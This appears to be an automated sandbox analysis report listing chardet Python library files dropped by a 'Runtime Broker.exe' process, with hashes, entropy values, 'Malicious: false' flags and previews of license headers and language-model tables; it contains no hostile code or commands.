Preview:	""".All of the Enums that are used throughout the chardet package...:author: Dan Blanchard (dan.blanchard@gmail.com)."""...class InputState(object):. """. This enum represents the different states a universal detector can be in.. """. PURE_ASCII = 0. ESC_ASCII = 1. HIGH_BYTE = 2...class LanguageFilter(object):. """. This enum represents the different language filters we can apply to a. ``UniversalDetector``.. """. CHINESE_SIMPLIFIED = 0x01. CHINESE_TRADITIONAL = 0x02. JAPANESE = 0x04. KOREAN = 0x08. NON_CJK = 0x10. ALL = 0x1F. CHINESE = CHINESE_SIMPLIFIED \| CHINESE_TRADITIONAL. CJK = CHINESE \| JAPANESE \| KOREAN...class ProbingState(object):. """. This enum represents the different states a prober can be in.. """. DETECTING = 0. FOUND_IT = 1. NOT_ME = 2...class MachineState(object):. """. This enum represents the different states a state machine can be in.. """. START = 0. ERROR = 1. ITS_ME = 2...c

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\escprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3950
Entropy (8bit):	4.7144135499229085
Encrypted:	false
SSDEEP:	96:Kt17u4Abi3JGELunBiIn349ZX6HL6awXaUAsk2n:Kt17u4Abi51LuIIn34P6eaaV
MD5:	A43AE497CCD0D98F53E4F2E7EF5250E2
SHA1:	3F5C243F912E8E14DF288F356403A5D920159B3E
SHA-256:	924CAA560D58C370C8380309D9B765C9081415086E1C05BC7541AC913A0D5927
SHA-512:	54A4091F88901E96742A935EB6D8A18A6463B00234AD3B5A10A41376EB3AD9750E489BC782EC741BD0FAB242B3C3D84A549CA1DEEB8547AE0999A21E219C6F78
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\escsm.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	10510
Entropy (8bit):	4.816326627010161
Encrypted:	false
SSDEEP:	192:Kt17u42Uiw4c0gE4999/M///eeeVe//97PPnxJRae99999M0f/9999g//////N/J:6u4v0FArwa1l
MD5:	9C3BAAFEFA516EA1EEFCB03593C8CB1D
SHA1:	B6AE3D309926B691E6E8BE5DF7E9EC7E22DDAF62
SHA-256:	46E5E580DBD32036AB9DDBE594D0A4E56641229742C50D2471DF4402EC5487CE
SHA-512:	FFA57445FC50ABE5B6ECDF8B5EFDD96A97D1C068E8140D36A2755D9095AEB11FD826848E4B54F6183E0B5775AE4B7A2074D997185A23B34CAEA5F4BF1C80A035
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\eucjpprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3749
Entropy (8bit):	4.731931768516198
Encrypted:	false
SSDEEP:	96:Kt17u493gzxj6HtQyylEl+s/rRWTIIRpB:Kt17u493y56ie4z
MD5:	7FCBC25522B5FB00AD88D12E86022F16
SHA1:	F583D01EA725D06785A47BE5AA47A9586CB4E843
SHA-256:	883F09769D084918E08E254DEDFD1EF3119E409E46336A1E675740F276D2794C
SHA-512:	6C84F3B62F696C19CEC04CF795D7379D423B5B37FCCD3F94D5670AEE6361B424BF3B943B77E08C5DEF0296B4E1437501648F495437B2D38182DB9CA4AE1CD437
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\euckrfreq.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	13546
Entropy (8bit):	4.072619899441131
Encrypted:	false
SSDEEP:	192:kt17u4FdvXtmWt5mYt8EkFiTPJ1CTgEdCJz0ZUnYP+smG1tBLC/lGMwxpppHg:8u4vfQgJ8EkYTPJ+dtZggIG5L8G5RpHg
MD5:	FC74D266C33CB05F1ECD53EC517EC462
SHA1:	F92F0B57596EC180FB1505D3B3B966F07D61DFAA
SHA-256:	FBB19D9AF8167B3E3E78EE12B97A5AEED0620E2E6F45743C5AF74503355A49FA
SHA-512:	4D3AA23B3F95EFE49A8F2201FFEA90154264BF545F70B96B8AB2F2481D74514244C82B076EB4C616962243EE40D2EBAD2BB66154FBDABCE0E739DBD3883A16AD
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\euckrprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1748
Entropy (8bit):	4.9856800780876736
Encrypted:	false
SSDEEP:	24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HWRTmjrsBATsDaMK:Kx/1ef0uwyUjHSvojrsBc7MK
MD5:	35C9C358A1F2554B15382675B680CB38
SHA1:	17A570BA185BF5BAC0B670932D3EA74376E19F7B
SHA-256:	32A14C4D05F15B81DBCC8A59F652831C1DC637C48FE328877A74E67FC83F3F16
SHA-512:	341BA6EC350ED7212AA2E77DADE00297100CFFB9650871025E4B798B1522055CCD41BA1919AA577B6716AB4A4B8AFED806BCCE0E35D9B97FB2413385750CE853
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\euctwfreq.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	31621
Entropy (8bit):	3.8933123222030295
Encrypted:	false
SSDEEP:	768:8u4fWnmUAziXRa7ZLTQAg0ljyeZCN04skmj22bgBXrgb/QWA4Pcvx:8dAbheZIANZyV04s7XbgBXrgRPcJ
MD5:	F22F9B84302F594271169463DF2C2ADC
SHA1:	1FE6190636462E94488B056A56770C84D48F3370
SHA-256:	368D56C9DB853A00795484D403B3CBC82E6825137347231B07168A235975E8C0
SHA-512:	A1C424421B90AE8D889C20DF9C2B7402502C81BBFB2EBCA6482FE076FA6E9C99C4062618A1BB866AB58652EB13CEB3A16B21673B85E252A9B8B34E1766E0128A
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\euctwprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1747
Entropy (8bit):	4.986618421486693
Encrypted:	false
SSDEEP:	24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HWRT8j8Afs/ba8Xy:Kx/1ef0uwyUjHSv640H8Xy
MD5:	BA6A1374A470177EC21C4E1528E23F5B
SHA1:	F6ECD5D34962A5B81B71BDC40B140D553A0C120E
SHA-256:	D77A7A10FE3245AC6A9CFE221EDC47389E91DB3C47AB5FE6F214D18F3559F797
SHA-512:	444E6AD68079ECC0AA10330638B1B8FA632BD111CB63DEF3BDA2673A69C0F1E77374342F7D7581EFF98221E320A36D1A65DE265F03E3FF009FE0DD4045C941CC
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\gb2312freq.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	20715
Entropy (8bit):	3.934954005362253
Encrypted:	false
SSDEEP:	384:8u4UnDMKZJsgZwUfIp3Gy/7IJaGDO4Pd6yFapYgEMke0eapNvVqr:8u4UDMwJhZwUfE3G3jDFapzEMOhVU
MD5:	855D0A3B3FE3F931EB7D4A3F77E9F349
SHA1:	BF8051DEF4AF0BF4B04AD3C997A64A356D2EFECB
SHA-256:	257F25B3078A2E69C2C2693C507110B0B824AFFACFFE411BBE2BC2E2A3CEAE57
SHA-512:	4EA7F01BB64244684BB1CB7BF92B24E6D45DF92B2B8957FFE8198BE569F5862B9666806F355599ED5CAE0CEB655797F90DD4569BAE210F89CDFB15509CBB4B9E
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\gb2312prober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1754
Entropy (8bit):	5.003388925716946
Encrypted:	false
SSDEEP:	24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HWRTl4VAQsfaonD:Kx/1ef0uwyUjHSvr4FXqD
MD5:	E9B4EABD5CDA31D434F10B7299B4B47E
SHA1:	BC2518F812EEF5713556D847B933230C00BB22D4
SHA-256:	806BC85A2F568438C4FB14171EF348CAB9CBBC46CC01883251267AE4751FCA5C
SHA-512:	07D13ED4B7830FA3FB96B9BB7BD0387B55D5AE4AA83809F04212B4F4F4E574B39017744A522F4AEDD6F1DA26ECDA1CF5F960E011DC677A1D13A670D23F0CCE8C
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\hebrewprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	13838
Entropy (8bit):	4.719327774455086
Encrypted:	false
SSDEEP:	192:Ppf7u4TcWpp0mOJBucQcy4z3lnTB3H19S/egaFTLDVQMfeuVnuK3Ho:Bu4TcWppLIyclnTB3H19SWhLkao
MD5:	EE487DF69E219E2AF034E50ED27F6E99
SHA1:	07093CA2075F52D3D07B399A52F4A7491928FB1C
SHA-256:	737499F8AEE1BF2CC663A251019C4983027FB144BD93459892F318D34601605A
SHA-512:	AEB7BAF2A418B535916ECDEA1A295A5303107A29FA7666C8E6130BC5E80C195A08CD17F5E83D4C9EBE40C0C7F77F8514DB7BE9D063D6D26C6F0E5AED198346D8
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Shy Shalom.# Portions created by the Initial Developer are Copyright (C) 2005.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\jisfreq.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	25777
Entropy (8bit):	3.937817597776383
Encrypted:	false
SSDEEP:	768:8u4e1Pw/tan6GGY/XTTd1SuqmsEn5nxo+1E:8FVanVGYf27E5nxov
MD5:	34BE526E85A890AF4C0C38DF38D56B71
SHA1:	12A38AC0C60C3F5A8756A9E03EE74A22C9B481C0
SHA-256:	BE9989BF606ED09F209CC5513C730579F4D1BE8FE16B59ABC8B8A0F0207080E8
SHA-512:	32C352C308F8956D8FC012C31C523937657F8CD86CC7A1DEE3C11E5770CB892138FD5DD810DD59AF8F1E7ADD6178B5CC06B085FC385BA6F8B3CA3035EE4759D3
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\jpcntx.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	19643
Entropy (8bit):	3.752207229692923
Encrypted:	false
SSDEEP:	384:8u4uzUSmG2Z94gNDp94q0p+Ory6SrE/KWVB7DWGgIYe0OfpOHbOoQFI0j73x8QrN:8u4I
MD5:	09BDB0C4F23A05CFEEB4F498F8B19D96
SHA1:	B6332D34D3820C06E07EB31AB68A22B5365882AA
SHA-256:	3D894DA915104FC2CCDDC4F91661C63F48A2B1C1654D6103F763002EF06E9E0A
SHA-512:	F3393FF0BE901392F905B17B5E53EFBDDA5626DAE62A557F71EBA9C5078ED30D167C0D801D5DB93BA060AD58909B8A2916BCE700B982D7CBBC6A30C102CFA51B
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\langbulgarianmodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, UTF-8 Unicode text executable
Category:	dropped
Size (bytes):	105685
Entropy (8bit):	3.2280969632799597
Encrypted:	false
SSDEEP:	768:VWzg7jiE0QrPHa/mimSvsgMdA+TFxns0mDQIy7RfO3I8lVrzFWmNQZ5MuGSjiJxB:307
MD5:	DC8BFCBD96E48E1EEC871008B9DF4C41
SHA1:	AB01C692BAC446348C1B6E1AEB8C41C76460C6D4
SHA-256:	AFAB6F3AD3BC16A8676D6041E55E1CCDC9757D6338A41F651A259053EF20BECC
SHA-512:	7C2F368A330ED3A5053BAD05ED9D493445ED6FE5E33B99FE185BB8AB561AD1BA215DB2362F100344D76B19FFFD8B3E945263BE5B1DA6D39072AB5B1ABBB502E6
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..BULGARIAN_LANG_MODEL = {. 63: { # 'e'. 63: 1, # 'e'. 45: 0, # '\xad'. 31: 0, # '.'. 32: 0, # '.'. 35: 0, # '.'. 43: 0, # '.'. 37: 0, # '.'. 44: 0, # '.'. 55: 0, # '.'. 47: 0, # '.'. 40: 0, # '.'. 59: 0, # '.'. 33: 0, # '.'. 46: 0, # '.'. 38: 0, # '.'. 36: 0, # '.'. 41: 0, # '.'. 30: 0, # '.'. 39: 0, # '.'. 28: 0, # '.'. 34: 0, # '.'. 51: 0, # '.'. 48: 0, # '.'. 49: 0, # '.'. 53: 0, # '.'. 50: 0, # '.'. 54: 0, # '.'. 57: 0, # '.'. 61: 0, # '.'. 60: 0, # '.'. 56: 0, # '.'. 1: 0, # '.'. 18: 1, # '.'. 9: 1, # '.'. 20: 1,

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\langgreekmodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, UTF-8 Unicode text executable
Category:	dropped
Size (bytes):	99559
Entropy (8bit):	3.211527056560738
Encrypted:	false
SSDEEP:	768:Q2I3Miw2Aa0VG426bvLkhVcwciD+v+BfChi0Qf2nbO4WeGfjvecIxZcdXcAxDitm:kZp
MD5:	15AA944AF16F7BBBA2DCF664E22CE077
SHA1:	C59BC42593F0B922B73F7A0179403F203CEA46B1
SHA-256:	D5C32EDB05203C1F1B43645B5634782CDC020844E043E0F0A34120DBFB81D75B
SHA-512:	5D90AFFC16754CE7EDA7C13160B98DF1BE90E99D2721DB805AC7589AAC6F2BA91CB63FC76C1B60E2541BDFFFED765A7A0DBDA80382A78947C1B40FE96BBCDA7E
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..GREEK_LANG_MODEL = {. 60: { # 'e'. 60: 2, # 'e'. 55: 1, # 'o'. 58: 2, # 't'. 36: 1, # '.'. 61: 0, # '.'. 46: 0, # '.'. 54: 0, # '.'. 31: 0, # '.'. 51: 0, # '.'. 43: 0, # '.'. 41: 0, # '.'. 34: 0, # '.'. 40: 0, # '.'. 52: 0, # '.'. 47: 0, # '.'. 44: 0, # '.'. 53: 0, # '.'. 38: 0, # '.'. 49: 0, # '.'. 59: 0, # '.'. 39: 0, # '.'. 35: 0, # '.'. 48: 0, # '.'. 37: 0, # '.'. 33: 0, # '.'. 45: 0, # '.'. 56: 0, # '.'. 50: 1, # '.'. 57: 0, # '.'. 17: 0, # '.'. 18: 0, # '.'. 22: 0, # '.'. 15: 0, # '.'. 1: 0, # '.'. 29: 0, # '.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\langhebrewmodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, UTF-8 Unicode text executable
Category:	dropped
Size (bytes):	98764
Entropy (8bit):	3.1733435275076394
Encrypted:	false
SSDEEP:	3072:F+xq/jLobEVWpt/ntjhejcQxmmLcRBi0k91FPWTXpPBMA3WzcboML7DmHlCkXMlA:F+xq/jLobEVWpt/ntjhejcQxmmLcRBiD
MD5:	7BD1A4AB964AD4F763CB83C9E3AEE8A8
SHA1:	E072A2E9BC510374083C9CB9E3FE460D6A22B91F
SHA-256:	BAB3262471C85ED0B069602ACB5CC463FE129B0C0DCEDEF7D1B0CEB635F3463B
SHA-512:	55D6E3F28E8164BE1A1EC2C808378F5F033F1AB811D632B534D50CE513443F2FCC1AC4D9BDF4626859FF9692B2947523DF540A8A1A9618600CFDC63A35A803AF
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..HEBREW_LANG_MODEL = {. 50: { # 'a'. 50: 0, # 'a'. 60: 1, # 'c'. 61: 1, # 'd'. 42: 1, # 'e'. 53: 1, # 'i'. 56: 2, # 'l'. 54: 2, # 'n'. 49: 0, # 'o'. 51: 2, # 'r'. 43: 1, # 's'. 44: 2, # 't'. 63: 1, # 'u'. 34: 0, # '\xa0'. 55: 0, # '.'. 48: 0, # '.'. 39: 0, # '.'. 57: 0, # '.'. 30: 0, # '.'. 59: 0, # '.'. 41: 0, # '.'. 33: 0, # '.'. 37: 0, # '.'. 36: 0, # '.'. 31: 0, # '.'. 29: 0, # '.'. 35: 0, # '.'. 62: 0, # '.'. 28: 0, # '.'. 38: 0, # '.'. 45: 0, # '.'. 9: 0, # '.'. 8: 0, # '.'. 20: 0, # '.'. 16: 0, # '.'. 3: 1, # '.'.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\langhungarianmodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, UTF-8 Unicode text executable
Category:	dropped
Size (bytes):	102486
Entropy (8bit):	3.112000025853554
Encrypted:	false
SSDEEP:	768:F8Do+PPz8n9nkDCC6gbDibWAp30fbH4Fha9YCnP0azyUCx6+U08amh1NNEbSgmW+:FAT
MD5:	4ED0A68F3E35F1835176D355C9A0874A
SHA1:	3C0556AA1EF370A83F3F456BE839F315CC0ACB1E
SHA-256:	383022B2FA827DEB3C07815EC8CFCF83D1D8DD90E7132682893E01C72CE873AC
SHA-512:	03AA4C3571E0C275D8635736D900CF671AF4A5D529533CDAD61653BA0449F4C4233FA27B914C0F553E1A0F39AF401FBB8833C8D7B60F45A9A573BB82302D8694
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..HUNGARIAN_LANG_MODEL = {. 28: { # 'A'. 28: 0, # 'A'. 40: 1, # 'B'. 54: 1, # 'C'. 45: 2, # 'D'. 32: 1, # 'E'. 50: 1, # 'F'. 49: 2, # 'G'. 38: 1, # 'H'. 39: 2, # 'I'. 53: 1, # 'J'. 36: 2, # 'K'. 41: 2, # 'L'. 34: 1, # 'M'. 35: 2, # 'N'. 47: 1, # 'O'. 46: 2, # 'P'. 43: 2, # 'R'. 33: 2, # 'S'. 37: 2, # 'T'. 57: 1, # 'U'. 48: 1, # 'V'. 55: 1, # 'Y'. 52: 2, # 'Z'. 2: 0, # 'a'. 18: 1, # 'b'. 26: 1, # 'c'. 17: 2, # 'd'. 1: 1, # 'e'. 27: 1, # 'f'. 12: 1, # 'g'. 20: 1, # 'h'. 9: 1, # 'i'. 22: 1, # 'j'. 7: 2, # 'k'. 6: 2, # 'l'. 13: 2, # 'm'.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\langrussianmodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, UTF-8 Unicode text executable
Category:	dropped
Size (bytes):	131168
Entropy (8bit):	3.38395885481753
Encrypted:	false
SSDEEP:	768:J0RRnoENBU6imohUZm6Whzs8M3AwuiZLhOuaSVg3cNL9Y/UfG95Hlkbd2yZsRTvw:kk5bmhmRI3
MD5:	82770A8C9E90FF4EA6A510A763B048A0
SHA1:	FEC8F5FFD0CCE37D324A22985D2D27BE29B42E4D
SHA-256:	B0FAA4AC16D7D10570C32EA8A9197EC7B111BF6278FB368CA02BCBA644AC4892
SHA-512:	909BB037A07E8868776A1E51F35E60875F631A59824BBC735C0BC7A5120370710FC6ED0D32D30BE1BDD1C5342BABE62B5C64EAF31E81C88D04A4D5CA44270CFF
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..RUSSIAN_LANG_MODEL = {. 37: { # '.'. 37: 0, # '.'. 44: 1, # '.'. 33: 1, # '.'. 46: 1, # '.'. 41: 1, # '.'. 48: 1, # '.'. 56: 1, # '.'. 51: 1, # '.'. 42: 1, # '.'. 60: 1, # '.'. 36: 1, # '.'. 49: 1, # '.'. 38: 1, # '.'. 31: 2, # '.'. 34: 1, # '.'. 35: 1, # '.'. 45: 1, # '.'. 32: 1, # '.'. 40: 1, # '.'. 52: 1, # '.'. 53: 1, # '.'. 55: 1, # '.'. 58: 1, # '.'. 50: 1, # '.'. 57: 1, # '.'. 63: 1, # '.'. 62: 0, # '.'. 61: 0, # '.'. 47: 0, # '.'. 59: 1, # '.'. 43: 1, # '.'. 3: 1, # '.'. 21: 2, # '.'. 10: 2, # '.'. 19: 2,

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\langthaimodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, UTF-8 Unicode text executable
Category:	dropped
Size (bytes):	103300
Entropy (8bit):	3.251398022554534
Encrypted:	false
SSDEEP:	768:RO4yRslJrHAeANp4vS6g47Wbq0fMmRNndxvlS0rqXiME71+aMZ2ZIwMbdJ7Hh4At:Zf
